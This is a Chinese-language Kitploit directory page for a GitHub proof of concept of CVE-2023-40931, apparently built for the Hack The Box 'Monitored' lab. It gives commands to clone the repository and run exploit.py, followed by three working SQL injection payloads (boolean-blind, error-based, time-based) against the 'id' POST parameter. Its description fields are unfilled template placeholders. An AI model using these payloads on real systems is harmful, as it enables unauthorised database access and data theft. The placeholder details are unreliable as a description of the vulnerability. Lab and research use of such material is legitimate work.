Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-40931-POC — 为 HTB MONITORED 制作的 CVE-2023-40931 概念验证 | Kitploit
工具/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

为 HTB MONITORED 制作的 CVE-2023-40931 概念验证

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-40931 概念验证 (PoC) 🚨

本仓库包含针对 CVE-2023-40931 的概念验证 (PoC),该漏洞是在 [受影响的软件/系统] 中发现的一个安全漏洞。本仓库的目的仅为教育和研究目的,以演示该漏洞。🛠️

免责声明 ⚠️

本项目仅用于教育目的和授权测试。滥用此代码可能会导致法律后果。作者不对因使用此代码造成的任何滥用或损害负责。在测试任何系统之前,请务必获得适当授权。🔒

详细信息 📋

  • CVE 编号:CVE-2023-40931
  • 漏洞类型:[漏洞类型,例如:远程代码执行、权限提升]
  • 受影响的软件:[受影响的软件名称和版本]
  • 严重性:[严重性级别,例如:严重、高危] 🚩

有关更多信息,请参阅官方 CVE 条目:CVE-2023-40931。🔗

使用方法 🚀

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    POST 参数 'id' 存在漏洞。以下有效载荷成功利用了该漏洞:

    • 基于布尔的盲注:该有效载荷利用条件语句判断查询的真值,通过布尔逻辑实现数据提取。

      • 有效载荷:action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • 基于错误的注入:该有效载荷通过触发特定错误,利用数据库错误消息来提取信息。

      • 有效载荷:action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • 基于时间的盲注:该有效载荷使用时间延迟,通过观察服务器的响应时间来推断信息。

      • 有效载荷:action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    这些有效载荷表明该漏洞易受 SQL 注入攻击。请谨慎操作,并在测试前确保已获得适当授权。🔒

  2. 按照 exploit.py 文件中的说明执行 PoC。🧑‍💻

    注意:确保已安装所需的依赖项。✅

下载工具